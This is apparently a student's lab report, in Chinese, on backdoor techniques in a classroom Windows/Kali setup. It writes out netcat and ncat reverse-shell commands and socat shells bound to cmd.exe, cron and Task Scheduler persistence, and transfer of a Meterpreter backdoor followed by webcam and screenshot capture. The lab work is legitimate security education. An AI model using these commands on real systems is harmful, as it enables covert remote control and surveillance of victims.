Exp2 后门原理与实践_20151208丛俐宇

实验内容 

1.使用netcat获取主机操作Shell,cron启动 (0.5分)

Win获得Linux Shell

以下实践Windows基本Win7-64bit, Kali2-64bit.

1.windows 打开监听

D:\ncat>ncat.exe -l -p 1208

这一步由于对命令内容不了解熟悉频频输入错误,反复修改才成功。

2.Linux反弹连接win

首先查看winip

通过观看Linux配置确认选择192.168.129.1,

root@congliyu:# nc 192.168.129.1 1208 -e /bin/sh

3.windows下获得一个linux shell,可运行任何指令,如ls

D:\ncat>ncat.exe -l -p 1208  
ls

Linux获得Win Shell

1.Linux运行监听指令

root@congliyu:# nc -l -p 1208

 

2.Windows反弹连接Linux

 D:\ncat>ncat.exe -e cmd.exe 192.168.129.129 1208

 

3.Linux下看到Windows的命令提示

root@congliyu:# nc -l -p 1208 

 Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

cron

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

--

1.crontab指令增加一条定时任务,"-e"表示编辑。

root@congliyu# crontab -e
no crontab for root - using an empty one

Select an editor.  To change later, run 'select-editor'.
  1. /bin/nano        <---- easiest
  2. /usr/bin/mcedit
  3. /usr/bin/vim.basic
  4. /usr/bin/vim.gtk
  5. /usr/bin/vim.tiny

 

--

2.因为是第一次编辑,故提示选择编辑器,选择3,并添加了最后一行。简单说就是在每个小时的第9分钟执行后面的那条指令。

Choose 1-5 [1]: 3
crontab: installing new crontab
9 * * * * /bin/netcat 192.168.129.1 1208 -e /bin/sh

--

3.保存、退出后配置即生效。可以通过"crontab -l"来查看,"-l"表示list。

root@congliyu# crontab -l
9 * * * * /bin/netcat 192.168.129.1 1208 -e /bin/sh

--

4.每个小时到了9分,上面的那条指令就会执行。

--

成功

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

SoCat

Netcat++,超级netcat工具。

从老师给的资源下载后解压

在win中点击控制面板->系统和安全->->任务计划程序,进入下面的画面:

选择创建任务,在常规选项卡中编辑名称,并在触发器选项卡中选择工作站锁定,这样在靶机锁定的时候,我们的socat就会传递远程shell

操作选项卡中绑定socat程序,给出参数tcp-listen:1208 exec:cmd.exe,pty,stderr

下图为刚开始的选择,选成了ncat,一开始自己还不知道,多次错误后从头来过才更正,要不是当时截了图怕是都不知道为何错。

成功如下

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

生成文件特慢,我等啊等也不出,一顿乱点,多点了好几下。。。。

把这个后门程序拷贝到win中去,使用ncat传输

在kali中输入ncat -l 1208 < 20151208_backdoor.exe

在win的nc所在目录下输入nc 192.168.129.129 1208 > 20151208_backdoor.exe

这样就将程序拷贝到了win中。

接着,进入msfconsole中去

这个过程也好久。。

然后在win中打开传过去的backdoor.exe

 

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

有了上面的步骤,这步就输入对应指令就ok

dir

输入webcam_snap,拍照(我和萌萌的室友)

输入webcam_stream,摄像,screenshot截屏

getuid显示当前用户,输入getsystem尝试提升权限,失败了,截图也不知道哪去了。。。

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

直接出厂就安好的,就像老师课上说的那样,很可怕却无可奈何。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

根据任务计划定时启动啊,或者做个诱导界面让用户自己点。

(3)Meterpreter有哪些给你映像深刻的功能?

很多很多,总之感觉很神奇也很可怕,几乎每个步骤都印象深刻吧

(4)如何发现自己有系统有没有被安装后门?
上网看了看,大致就是利用防火墙,在防火墙看开启的端口及对应的进程,一般不是系统默认开启的端口都是可疑的,要找一下对应的进程,
找到对应进程,对相应进程进行抓包,看他通信的数据,分析是不是后门,当然更高端的方法有的是,至于我自己,还是老老实实360。

 

实验总结与体会

这次实验给我印象颇深,通过一系列的操作最终完成了入侵操控靶机的目的,虽然过程很是艰难,啥也不懂只能慢慢一步步看,一点点找讲义,找博客,然后命令不知道,操作不熟,一直出错,错了也不知道为啥,只能缓慢琢磨,和室友互相印证,进度极慢,好在终究是成功完成了,成功时还是很激动的,感受到了meterpreter的强大与可怕,终于也是让我开心了一把,好在没白白奋斗这么久,收获还是不少的,也更加期待后面的实验了。

 

posted on 2018-03-29 18:07  丛俐宇  阅读(139)  评论(0编辑  收藏